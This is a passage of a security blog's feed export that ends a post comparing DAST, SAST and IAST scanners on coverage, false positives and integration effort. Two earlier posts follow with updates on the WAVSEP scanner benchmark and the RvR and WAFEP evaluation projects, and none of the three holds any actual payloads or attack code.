  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 85.5pt;&quot; valign=&quot;top&quot; width=&quot;114&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Performed&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 89.75pt;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Commonly
  Used&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Exploitation POC&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Full Scale Exploitation: Data
  Extraction, RCE, Shell Upload&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;In Some
  Solutions&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Performed&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 85.5pt;&quot; valign=&quot;top&quot; width=&quot;114&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Performed&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 89.75pt;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;In Some
  Solutions&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: &amp;quot;Times New Roman&amp;quot;; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: normal; letter-spacing: normal; margin: 0px; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;
&lt;/div&gt;
Additional importance is given to the information the various tools provide to a &lt;b&gt;HUMAN&lt;/b&gt; trying to discern the relevance of the issues reported, and tool-set (if any) provided to &quot;reproduce&quot; or manually &quot;verify&quot; the identified security issues.&lt;br /&gt;
&lt;br /&gt;
Furthermore, the false positive factor will become&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt; EVER MORE IMPORTANT&lt;/span&gt;&lt;/b&gt; with the increase in volume of scanned applications. Weeding out false positive from actual issues will require &lt;b&gt;time and effort &lt;/b&gt;from a security expert, and any misinterpretations will cost even more for developers to mitigate.&lt;br /&gt;
&lt;br /&gt;
To complete the picture for the various technologies, let&#39;s present the &lt;b&gt;RELATIVE integration/maintenance effort&lt;/b&gt; vs. the *&lt;b&gt;typical* false-positive&lt;/b&gt; effort required to identify actual issues throughout the analysis cycle:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan;&quot;&gt;&lt;b&gt;Click to Enlarge&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS-Ys0IliG0n5prVbaYUxuOqVyqUpt4Nah27YkZSBwRpauuhRESntAcQZNuaq6do_aP567HH_3ApClNG9YkR6ypEaezurrf1ROMxplkonDfMe7AIFQzwz9_5gy8jmzKqtGLHnUfZ6CSBg/s1600/Conclusion-Chart-FP-vs.Integration-vs.Maintenance.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS-Ys0IliG0n5prVbaYUxuOqVyqUpt4Nah27YkZSBwRpauuhRESntAcQZNuaq6do_aP567HH_3ApClNG9YkR6ypEaezurrf1ROMxplkonDfMe7AIFQzwz9_5gy8jmzKqtGLHnUfZ6CSBg/s640/Conclusion-Chart-FP-vs.Integration-vs.Maintenance.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;&lt;tbody&gt;&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
So there you have it, technology and coverage, integration and false positive ratio for various *typical* modern technologies, pitted against each other.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
And if the choice still seems complicated, that&#39;s ok, it&#39;s because it is.&lt;/div&gt;
&lt;br /&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;background: gray; border: 1pt solid; padding: 0in 5.4pt; width: 467.5pt;&quot; valign=&quot;top&quot; width=&quot;623&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;u&gt;There’s always the exception&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0in;&quot;&gt;
A relative obsolete and un-maintained DAST vulnerability scanner, in which there is little or no effort to “verify” detected vulnerabilities, will&amp;nbsp;&lt;b&gt;fare no better&lt;/b&gt;, and probably much worse, than a typical SAST/Passive-IAST solution, in terms of the ratio of false positive identification.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;On the other hand&lt;/b&gt;, a relatively immature or un-maintained SAST/Passive-IAST solution will fare much worse than presented in the charts - even in the effort required for &lt;b&gt;integration &lt;/b&gt;and &lt;b&gt;maintenance&lt;/b&gt;, especially compared to a modern DAST implementation.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
And what of other aspects ?&lt;br /&gt;
The ability to detect common and exotic issues, the performance scale, the RISKS applied to using each technology in different environments, and the overall recommendation ?&lt;/div&gt;
&lt;br /&gt;
Part II Coming Soon...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/7054206218230512514/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2017/05/dast-vs-sast-vs-iast-modern-ssldc-best.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7054206218230512514'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7054206218230512514'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2017/05/dast-vs-sast-vs-iast-modern-ssldc-best.html' title='DAST vs. SAST vs. IAST - Modern SSLDC Guide - Part I'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAPJA0MW1LBZVIJDplTBArYgxoBgPVD8wmiOS_Vf-0IJooCEoZ8PBhq2I9yOyNakCIxCS5G7irANlbp71CztoLz3k1uhKaeQrTfYfvOYV_qHXOVNspk6fQzh_2GT39ppZIyLlVaXSnBpc/s72-c/DAST-Tools.png" height="72" width="72"/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-3267282768417977323</id><published>2015-09-15T21:43:00.001-07:00</published><updated>2015-09-15T21:43:34.155-07:00</updated><title type='text'>WAVSEP Updates, FAQ and the 2015 Benchmark Roadmap</title><content type='html'>&lt;br /&gt;
A couple of updates on the WAVSEP 2015 benchmark:&lt;br /&gt;
&lt;br /&gt;
The 2015 benchmark is already ongoing, and I started testing scanners against a newer unpublished version of WAVSEP which will be published at the end of the benchmark.&lt;br /&gt;
&lt;br /&gt;
I&#39;ll be focusing on the usual commercial and actively maintained open source &lt;b&gt;&lt;a href=&quot;http://sectoolmarket.com/&quot; target=&quot;_blank&quot;&gt;contenders&lt;/a&gt;&lt;/b&gt;, but may include additional vulnerability scanner engines that match my criteria or join the comparison in one of the methods listed in &lt;b&gt;&lt;a href=&quot;http://sectoolmarket.com/joining-the-comparison.html&quot; target=&quot;_blank&quot;&gt;SecToolMarket&lt;/a&gt;&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;WAVSEP New Homepage&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
As of August 2015, WAVSEP has been official migrated to &lt;a href=&quot;https://github.com/sectooladdict/wavsep&quot; target=&quot;_blank&quot;&gt;github&lt;/a&gt;, and the various installation instructions have been migrated to the relevant github &lt;b&gt;&lt;a href=&quot;https://github.com/sectooladdict/wavsep/wiki&quot; target=&quot;_blank&quot;&gt;wavsep&amp;nbsp;wiki&lt;/a&gt;&amp;nbsp;&lt;/b&gt;(&lt;a href=&quot;https://github.com/sectooladdict/wavsep/wiki/WAVSEP-Installation-and-Deployment&quot; target=&quot;_blank&quot;&gt;installation&lt;/a&gt; / &lt;a href=&quot;https://github.com/sectooladdict/wavsep/wiki/WAVSEP-Features&quot; target=&quot;_blank&quot;&gt;features&lt;/a&gt;).&lt;br /&gt;
&lt;br /&gt;
The source code, builds and wiki will be maintained in github, but I&#39;ll be releasing builds to &lt;b&gt;&lt;a href=&quot;http://sourceforge.net/projects/wavsep/&quot; target=&quot;_blank&quot;&gt;wavsep sourceforge&lt;/a&gt;&lt;/b&gt; repository as well.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Just to clarify - both repositories currently contain the latest public version of WAVSEP.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;About the Upcoming Benchmark&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The benchmark will cover all the previously covered aspects, as well as 2-3 additional attack vectors, and 2-3 new measurement concepts. Its the biggest one so far, but hopefully, I&#39;ll find smarter methods of assessing the products to speed up the process.&lt;br /&gt;
&lt;br /&gt;
As mentioned before, to make the results useful earlier, I&#39;ll be &lt;i&gt;&lt;b&gt;publishing some of the results&lt;/b&gt;&amp;nbsp;&lt;b&gt;&lt;u&gt;during&lt;/u&gt; the testing&lt;/b&gt;&lt;/i&gt; to &lt;b&gt;&lt;a href=&quot;http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot; target=&quot;_blank&quot;&gt;SecToolMarket&lt;/a&gt;&lt;/b&gt;, and tweet when there&#39;s updates to the various engines, instead of waiting to the end of the benchmark.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Vulnerability Scanner Feature Mapping to RvR&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The plan is to eventually associate the various features assessed in &lt;b&gt;WAVSEP&lt;/b&gt; with a new project called &lt;b&gt;RvR&lt;/b&gt; (relative vulnerability rating), currently hosted in the following &lt;b&gt;&lt;a href=&quot;http://www.tecapi.com/&quot; target=&quot;_blank&quot;&gt;address&lt;/a&gt;, &lt;/b&gt;aimed to define identical classifications of features for comparing security products.&lt;br /&gt;
&lt;br /&gt;
The RvR list still includes 288 (!) attack vectors with videos, links, etc, but there&#39;s already 60+ additional attacks pending to be added, contributed by volunteers from around the globe.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Trying to Release an Initial WAFEP Benchmark&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
WAFEP (Web Application Firewall Evaluation Project), WAVSEP&#39;s evil WAF testing brother, is almost ready for initial release, with thousands of &lt;b&gt;&lt;u&gt;proven&lt;/u&gt;&lt;/b&gt; WAF bypass payloads ready.&lt;br /&gt;
However, I&#39;m trying to release an initial benchmark with the framework, covering 2-5 WAF engines to make my point.&lt;br /&gt;
&lt;br /&gt;
Its tricky to stuff these projects in the same timeframe, and WAVSEP is my current priority, but we&#39;ll see how it works - WAFEP is designed to take a lot less testing time.&lt;br /&gt;
&lt;br /&gt;
In any event, I&#39;ll &lt;a href=&quot;https://twitter.com/sectooladdict&quot; target=&quot;_blank&quot;&gt;tweet&lt;/a&gt; about additional updates and whenever I update the results.&lt;br /&gt;
&lt;br /&gt;
Cheers&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/3267282768417977323/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2015/09/wavsep-updates-faq-and-2015-benchmark.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/3267282768417977323'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/3267282768417977323'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2015/09/wavsep-updates-faq-and-2015-benchmark.html' title='WAVSEP Updates, FAQ and the 2015 Benchmark Roadmap'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-3988329714516941185</id><published>2015-01-18T15:06:00.000-08:00</published><updated>2015-01-18T15:06:02.792-08:00</updated><title type='text'>RvR, WAFEP and WAVSEP results update</title><content type='html'>&lt;br /&gt;
Most of my time these days is spent on creating a dynamic interface for updating benchmark results, and on two major projects aimed at enhancing the WAVSEP evaluations and adding additional comparison content, in addition to accuracy, crawling and automation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The first project,&amp;nbsp;&lt;b&gt;RvR &lt;/b&gt;(&lt;b&gt;Relative Vulnerability Rating&lt;/b&gt;), is a project I already mentioned in the past which merges vulnerabilities from well known vulnerability classifications (WASC, CWE, CAPEC, OWASP, Blogs, Conferences, etc) into a list customized specifically for product feature evaluations.&lt;br /&gt;
&lt;br /&gt;
The list, originally planned to include 233 attack vectors, already includes &lt;b&gt;284 &lt;/b&gt;(&lt;b&gt;!!!&lt;/b&gt;) different attack vectors with unique classifications, links, repository mapping and &lt;b&gt;videos&lt;/b&gt;,&lt;br /&gt;
A web site containing the content was published last week, and although all the content is very much usable, I&#39;m still delaying the publication until I get some vendor feedback (expect an official publication soon).&lt;br /&gt;
&lt;br /&gt;
The purpose of the project is not only to evaluate features of dynamic vulnerability scanners (&lt;b&gt;DAST&lt;/b&gt;), but also to cover source code analysis tools (&lt;b&gt;SAST&lt;/b&gt;), interactive application testing tools (&lt;b&gt;IAST&lt;/b&gt;), and in contrast to the past - various software&amp;nbsp;protection products, including application-level &lt;b&gt;IDS/IPS&amp;nbsp;&lt;/b&gt;mechanisms and web application firewalls (&lt;b&gt;WAF&lt;/b&gt;).&lt;br /&gt;
&lt;br /&gt;
Which leads me to the second project -&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;WAFEP - The&amp;nbsp;Web&amp;nbsp;Application&amp;nbsp;Firewall&amp;nbsp;Evaluation&amp;nbsp;Project&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc9V2iEbAreZrcxmxBsRJBiA46OvD36NEqxDjLPiMO7GzfltGDiDiv9Ovu0wjtkK2Mlno17-kRlzvow5X8Hm49f6GI1n3g8TKMaf6aWMyN_t1DUOpT11aYIBXH-RDNAWq0HbkPzXax6qQ/s1600/wafep_logo_big.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc9V2iEbAreZrcxmxBsRJBiA46OvD36NEqxDjLPiMO7GzfltGDiDiv9Ovu0wjtkK2Mlno17-kRlzvow5X8Hm49f6GI1n3g8TKMaf6aWMyN_t1DUOpT11aYIBXH-RDNAWq0HbkPzXax6qQ/s1600/wafep_logo_big.png&quot; height=&quot;190&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span id=&quot;goog_1541670735&quot;&gt;&lt;/span&gt;&lt;span id=&quot;goog_1541670736&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;WAFEP &lt;/b&gt;is an upcoming project aimed to serve a WAVSEP-like role for various application-level protection products.&lt;br /&gt;
&lt;br /&gt;
Unlike WAVSEP, WAFEP is planned on being completely automated in terms of payload execution&amp;nbsp;&lt;b&gt;AND&lt;/b&gt;&amp;nbsp;result calculation, and would enable the evaluation of web application firewalls in relatively short timeframes.&lt;br /&gt;
&lt;br /&gt;
The &quot;accuracy&quot; aspect is implemented as attack vector specific payloads meant to simulate &lt;b&gt;context-specific&lt;/b&gt;&amp;nbsp;&lt;b&gt;exploits &lt;/b&gt;that an IDS/IPS/WAF should identify and/or prevent, false positive scenarios that should not be identified, and in the future, evasion techniques that may circumvent the detection process.&lt;br /&gt;
&lt;br /&gt;
The project already includes &lt;b&gt;thousands&amp;nbsp;&lt;/b&gt;of payloads imitating flavors of +-10 high-impact attack vectors, some of which were already published in an early alpha version uploaded to the project source forge repository last week.&lt;br /&gt;
&lt;br /&gt;
The &lt;b&gt;&lt;i&gt;published alpha version is just a technology POC&lt;/i&gt;&lt;/b&gt;, and does not include most of the vector payloads or content, but in the upcoming weeks I&#39;ll make an effort to finish up some sections in the platform and release a v1.0 public version.&lt;br /&gt;
I&#39;ll also publish updated versions with relevant payloads in the meantime, at least until I reach the 1.0 goal.&lt;br /&gt;
&lt;br /&gt;
http://sourceforge.net/projects/wafep/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;WAVSEP Results Update&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Finally, from time to time, I still try to squeeze in additional &lt;b&gt;WAVSEP &lt;/b&gt;product assessments for additional vendors, the latest of which is Tinfoil Security, alongside certain version upgrades,&lt;br /&gt;
&lt;br /&gt;
As always, the full list is found in &lt;b&gt;&lt;a href=&quot;http://www.sectoolmarket.com/&quot; target=&quot;_blank&quot;&gt;SecToolMarket&lt;/a&gt;&lt;/b&gt;, and the following image summarizes the updates:&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbqF5iKb0WI4KjGS8_gsT_H7iCOa_mXWNvxY3Ixv3ThGmM5FKu-dm5FDxq652ijmjEwdUwlp7cdWchxZ8nIlHlqfcLuijrUqdKVGKNIAS2YCOL6uAHzgVEI31xpgcRlAVJBiRm49HJWI4/s1600/wavsep-jan-2015-latest-results.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbqF5iKb0WI4KjGS8_gsT_H7iCOa_mXWNvxY3Ixv3ThGmM5FKu-dm5FDxq652ijmjEwdUwlp7cdWchxZ8nIlHlqfcLuijrUqdKVGKNIAS2YCOL6uAHzgVEI31xpgcRlAVJBiRm49HJWI4/s1600/wavsep-jan-2015-latest-results.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
If all goes well, in the near future, the list will be updated with the results of a couple of more.&lt;br /&gt;
&lt;br /&gt;
I didn&#39;t update the results of any of the open source products, and will try to find the time to do so in the near future, at least for some of the projects - a task that should be much easier once the dynamic interface is finally online.</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/3988329714516941185/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2015/01/rvr-wafep-and-wavsep-results-update.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/3988329714516941185'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/3988329714516941185'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2015/01/rvr-wafep-and-wavsep-results-update.html' title='RvR, WAFEP and WAVSEP results update'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" 